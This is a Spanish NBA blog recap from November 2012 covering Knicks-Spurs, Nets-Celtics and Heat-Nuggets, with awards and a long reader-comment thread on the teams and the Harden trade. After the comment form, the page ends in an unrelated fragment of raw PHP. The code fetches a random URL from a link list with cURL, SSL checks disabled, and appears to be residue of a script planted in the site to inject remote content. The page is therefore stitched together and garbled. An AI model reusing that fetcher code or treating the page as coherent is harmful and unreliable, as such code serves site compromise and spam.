La Crónica: Y van 6

16 de November de 2012 por HisRoyalAirness

Noche destacada en la NBA por calidad, que no por cantidad. Nos encontramos con 3 partidazos entre equipos de playoff, a cada cual más igualado.

El partido estrella de la noche enfrentaba a los 2 equipos que, junto a Memphis, han cuajado el mejor arranque de temporada: Knicks contra Spurs en el Álamo.

El partido comenzó  con Carmelo Anthony jugando muy bien, esperando al 2 contra 1 para mover el balón y muy intenso en defensa. Los de NY jugaron como un equipo sin complejos, con muchos pases y mucha variedad táctica en el aspecto ofensivo. 33 puntos les metieron a los de Pop en el primer cuarto, que no es tarea fácil. El emparejamiento de la estrella de Knicks con hombres grandes, como Duncan por momentos, hizo que se le notase cierta fatiga y, salvo un arreón en el tercer cuarto, se dedicó más a defender y a implicar a sus compañeros que a anotar. “Sólo” tomó 12 tiros pero capturó 12 rebotes.

Un gran trabajo de J-Kidd, con 2 triples comsecutivos al final del encuentro, de un agresivo Raymond Felton (25 puntos, 7 asistencias), los 17 puntos de JR Smith, que continúa en un gran estado de forma, y un juego muy coral del resto del roster unido a una valiente apuesta de Woodson (cuando perdían en el último periodo metió a un quinteto de “pequeños”: Melo-JR-Felton-Kidd-Chandler) dieron una merecida y trabajada victoria a los de Manhattan (104-100). 

Por parte de los Spurs destacar, como no, al trío calavera que sumaron 45 puntos, 22 rebotes y 18 asistencias y a un gran Tiago Splitter, que hizo daño en la pintura con 13 puntitos.

En el Barclays Center un duelo entre 2 equipos de la Atlantic Division prometía intensidad a raudales. Los Celtics, sin poder contar con el gran Rajon Rondo por lesión, lo intentaron todo contra los Nets pero, en el último cuarto, un gran acierto de “Jo-Jo” y alguna acción in extremis sin fortuna de Pierce decantaron la balanza para el equipo local (97-102). Los de Brooklyn demostraron el poderío de su quinteto que, al descanso, contaba ya con 4 hombres en dobles figuras. Destacada actuación de Deron Williams (24 puntos, 8 asistencias) y de los hombres interiores Humpries y Lopez.

La noche la cerraba el enfrentamiento entre Miami y Denver. Los Nuggets no pudieron hacer nada contra el angelito Lebron James, que les plantó 27 puntos, 7 rebotes, 12 asistencias y 3 tapones. Aún sin Wade, baja por un esguince de tobillo, el de Akron encontró en Shane Battier a su mejor escudero, que metió 18 puntos SOLO tirando triples (6 de 7).

Destacar por parte de los de George Karl a Kenneth Faried con 16 puntos y 20 rebotes y un buen y equilibrado trabajo de equipo, con todos sumando como nos tienen acostumbrados. Pero James es mucho James (98-93).

PREMIOS

MVP: Nuevo premio para James “King” LeBron que se quedó a 3 rebotes del triple-doble  con 27 puntos y 12 asistencias. La terna mágica de Brooklyn (Deron Williams – Joe Johnson – Brook López) son de nuevo candidatos pero no llegan por poco. Lo mismo que Raymond Felton.

Rookie: Nada que apuntar en este caso. 

Sorpresa: La mayor sorpresa a nuestro entender es ese 6-0 que los de la Gran Manzana exiben en su casillero. Los 20 rebotes de la Bestia Faried no nos sorprenden tanto teniendo en cuenta que su víctima fue Miami. También nos sorprende, y nos agrada, ver como los años no parecen pasar por Andre Miller.

Decepción:Los 0 puntos en una mala serie de Ty Lawson nos decepcionan y mucho. También lo hace Iguodala demostrando que no puede ser un jugador franquicia.

Esfuerzo en vano: Premio para Paul Pierce que sin Rondo al lado se las vió y deseo para hacer frente a las huestes neoyorquinas. 25 puntos y 7 asistencias para él le hacen llevarse el premio frente a los 19 puntos y 12 asistencias de Parker o el partidazo redondo de Andre Miller.

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. Esteban dice:
    #1

    bueno parece que los NYK van enserio esta vez, hay que ver cuanto la caga amare

    el 5 titular de los Nets aun sin gerald wallace sigue demostrando poder, estan 5-2 y podrian estar 6-1 si no hubiesen dejado escapar una victoria sencilla frente a los wolves cuando estuvieron por 22 puntos arriba en el tercer cuarto

      Citar

  2. Esteban dice:
    #2

    q tal jo jo? ha lanzado 40-104 tiros este año, ayer aparecio sobre el final y eso tiene un valor, pero los 3 primeros cuartos quizo hacerse el kobe bryant q no es, esta siendo mas un problema que una solucion

      Citar

  3. txusma dice:
    #3

    Tendrá Woodson las narices de sacar a Amare desde el banco a enfrentarse a la 2ª unidad del resto de equipos?

      Citar

  4. Ruxixón dice:
    #4

    Bueno,esta noche prueba de auténtico lujo para los Knicks,juegan en el FedEx Forum de Memphis ante un equipo que ha tenido un comienzo muy fuerte,es un auténtico partidazo (3.30 en directo en CUATRO para los españoles)

      Citar

  5. Sancho88 dice:
    #5

    Kidd-Felton-Carmelo-Stat-Chandler… suena de maravilla. El problema es si Stat se centra o sigue siendo el bufón de la corte. Creo que había muchas ganas de ver a unos Knicks arriba. A mí particularmente es un equipo que me cae bien y ojalá lleguen lejos este año. Semis como poco, visto lo visto. En cualquier emparejamiento de primera ronda contra equipos que no sean cabezas de serie (excepto Celtics) deberían ser favoritos. Los Pacers se caen de todas las quinielas, aunque si remontan tras la llegada de Granger entrarán en playoffs con los últimos puestos del Este regalados. Es el único equipo junto a Celtics que podría sorprenderles, o los Sixers con Bynum… no sé, en el Este hay 4 equipos muy sólidos ahora mismo, como son Knicks, Miami, BKN y Celtics, dos gratas sorpresas como los Bucks (intuyo que están ahí por el fácil calendario) y los Bulls sin Rose, peleando todos los juegos y los que han perdido lo han hecho por porquito; el sorpresón de la temporada con los Bobcats liderados por los jóvenes Walker y Gilchrist; Sixers que no terminan de arrancar, mediocres como siempre y esperando a Bynum como agua de mayo;

    y luego, los Hawks, Magic, Raptors, Cavs, Wizards y Pistons… dando lo que todos esperábamos, es decir, poquita cosa.

    Pero eso sí, el hostión de los Pacers en estas primeras semanas de competición es impresionante. Solo han ganado un partido fuera de casa contra los Raptors, y dos en casa contra Kings y Wizards, es decir, equipos desahuciados. Llevan 1-5 fuera de casa y son el peor ataque de la liga… quién lo iba a imaginar en pretemporada?

      Citar

  6. HisRoyalAirness dice:
    #6

    txusma:
    Tendrá Woodson las narices de sacar a Amare desde el banco a enfrentarse a la 2ª unidad del resto de equipos?

    Ni de coña

    (por dios, quítame ese “exiben”, que hace daño a las córneas!)

    PD: la conferencia este es, as always, mierda pura

      Citar

  7. Esteban dice:
    #7

    sancho88 te dije en el analisis previo que era optimista con estos bobcats y estan respondiende, no seran equipo de PO pero no pasaran verguenza

    es el tipico equipo “LEVANTA MUERTOS” la reedencion, una segunda oporunidad para salir del infierno

    ahi se encuetra un session tratano de hacer olvidar que era EL jugador que iba a sacar campeones a los lkaers y fue el peor s¿de su equipo en po, ESTA HAYWOOD q viene de ser amnistiado y denostado pro su rendimiento en dallas, esta warrick castigado como sustituto de amare en los suns, mullens si chances en el thunder, gordon ausado de todos los males de detroit (junto a villanueva)

    POR LA FORMA EN LA QUE JUEGAN TODOS ELLOS PARECE QUE SE HAN DADO CUENTA QUE SON LA COLA DE LA LIGA Y QUIEREN SORPRENDER, me han gustado

    tienen mucho talento ofensivo, en walker, henderson, gordon y sessions, mas warrick y MKG pueden hacer una digna campaña

      Citar

  8. Knickerbocker incondicional dice:
    #8

    9 largas temporadas despues por fin ganamos en el Alamodome, contra unos Spurs que ya nos destrozaron el sueño de ser campeones en las finales del 98-99 (Duncan como rookie y MVP de las finales). Uno de los partidos mas vibrantes de los Knicks que recuerdo en los ultimos años,comparable al Knicks-Lakers en el MSG hace unos meses cuando Lin todavia se perfilaba como hombre clave para los Knicks del futuro.

    Una primera mitad notable, un tercer cuarto de pesadilla (que extrañamente los Spurs no supieron aprovechar para irse en el marcador) y unos ultimos 12 minutos que tuvieron de todo y que merecen mencion especial.

    13 puntos consecutivos de Splitter (como te echan de menos en Vitoria) en los primeros 5 minutos, demostrando una vez mas los problemas de Chandler a la hora de defender a pivots con buen juego de pies. Es curioso ver como se arruga la figura de Tyson cuando tiene que enfrentarse con hombres made in Europe, dando la sensacion de torpeza incorregible, regalando 2+1 que no son menester. Recordaron su paso por las Olimpiadas en Londres, en las que Gasol y compañia lo retrataron. Sin embargo, cuando Popovich sento a Tiago (rompiendo la regla de oro de no sacar del partido al jugador en racha) y Chandler se las vio con Duncan, mejoro ostensiblemente su marca defensiva.

    Dificil explicar lo ocurrido en esos ultimos maravillosos 7 minutos. Dos nombres propios: Feldon Y Kidd. El primero mantuvo a los neoyorquinos en el partido cuando todo parecia indicar que los Spurs iban a finiquitar el encuentro. Es admirable la determinacion con la que penetro mas de una vez teniendo en frente a Duncan, demostrando su fortaleza fisica y falta de tapujos. Y Jason… que bien te sientan los años, con tres triples estratosfericos y dos robos clave, ademas de amargarle la noche a Parker y a San Antonio.

    En definitiva, los Knicks supieron aprovechar el apagon general del ataque de los Spurs,provocado por una defensa asfixiante, y se llevaron el partido silenciando a los criticos que alegaban la falta de competitividad de sus anteriores rivales. Esta noche tendran otra oportunidad de confirmar sus aspiraciones en Memphis, en otro duelo que se preve vibrante.

      Citar

  9. Esteban dice:
    #9

    Incondicional, en la 98/99 cuando los spurs vencieron a los knicks en las finales, timy duncan estaba en su segumdo año no en su año rookie

      Citar

  10. Knickerbocker incondicional dice:
    #10

    Esteban:
    Incondicional, en la 98/99 cuando los spurs vencieron a los knicks en las finales, timy duncan estaba en su segumdo año no en su año rookie

    Gracias por la correccion, metedura de pata por mi parte…

      Citar

  11. Esteban dice:
    #11

    No es nada grave amigo, pero estoy casi seguro q no ha habidop rookie MVP de finales

      Citar

  12. Esteban dice:
    #12

    Chamberlain y unsled fueron rookie del año y MVP de la regular pero no de finales

      Citar

  13. Knickerbocker incondicional dice:
    #13

    Esteban:
    No es nada grave amigo, pero estoy casi seguro q no ha habidop rookie MVP de finales

    En la temporada 79-80, final Lakers-Sixers, Magic como rookie fue MVP de las finales (tras la lesion de Kareem en el 5 partido) empezando como pivot en el sexto y definitivo partido en Philadelphia. Por aquel entonces el premio lo otorgaba la revista Sports Magazine, de la cual mi padre era parte. Creeme, le he escuchado un millon de veces contar la historia de como tuvo que ir a recoger a Magic al aeropuerto de JFK en NY (donde se encontraba la sede de la revista) y hacer de “botones” particular de un Magic de 20 añitos durante un par de dias. Hasta tiene enmarcado la carta de agradecimiento que le envio Magic despues, jeje.
    PD: no me lo esoty inventando, es verdad.

      Citar

  14. rojorob dice:
    #14

    Hombre, Magic fue MVP de las finales en su año rookie, no?

      Citar

  15. rojorob dice:
    #15

    Mira, pues sí. 😉

      Citar

  16. Esteban dice:
    #16

    Se me filtro magic! Mala mia!

      Citar

  17. Esteban dice:
    #17

    Viendo el arranque del thunder no le encuentro explicacion logica minima al traspaso de harden

    Una locura total

    La clave supuestamente era LAMB pero nisiquiera juega, mamita q mal la han hecho

      Citar

  18. Txusma dice:
    #18

    Hace apenas un par de meses estábamos todos emocionados con los rookies de los Rockets y repasemos: Lamb en los Thunder agitando toallas, Machao y Motiejunas en la D-League, Terrence Jones ha jugado un par de partidos y 6 minutitos de media, Royce White con problemas y multas por parte del equipo… Qué pena, la verdad!

      Citar

  19. melo15 dice:
    #19

    Asi se arruinan las carreras de los rookies…
    Yo no sabia que McHale era el tipo de entrenador que no daba oportunidades a los jovenes, se equivoca si se piensa que con Harden y Lin se van a meter en Playoffs.

      Citar

  20. Esteban dice:
    #20

    nadie mas cree que los thunder tomaron la peor decision con harden? cualquier otra hubiese sido mejor, mas viendo a LAMB, me convenci de que son idiotas

      Citar

  21. Knickerbocker incondicional dice:
    #21

    Claro que se equivocaron, Harden ya ha demostrado de sobra que era imprescindible en el exito de los thunder. Sin embargo, creo que ambas partes saldran perdiendo, ya que Oklahoma pierde mucho potencial pero Harden tampoco se beneficiara mucho de las aspiraciones de su nuevo equipo.

      Citar

  22. Esteban dice:
    #22

    a ver el trade se justifia en mcuhas partes por que haden no renovaria a fin de curso y lel thunder se quedaria sin nada

    pero por el llega kevin martin, quien cobra 12 millones y tampoco renovara a fin de curso, asi que se quedan sin nada lo mismo y con menos aspiraciones al titulo
    el factor x era lamb que supuestamente ocuparia el lugar de harden que ocupa martin este año, pero sin jugar un minuto dificilmente pueda ayudar a un equipo en su segundo año a ser campeon

    en fin, creo que la opcion mas logica era renovar a harden, y la segunda mas logica era dejarlo en el equipo para luchar el titulo este año

    pero nunca cambiarlo por un jugador CON LA MISMA CANTIDAD DE AÑOS DE CONTRATO QUE EL, y peor, o sea, no ganan mas que lamb y algunas selecciones

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>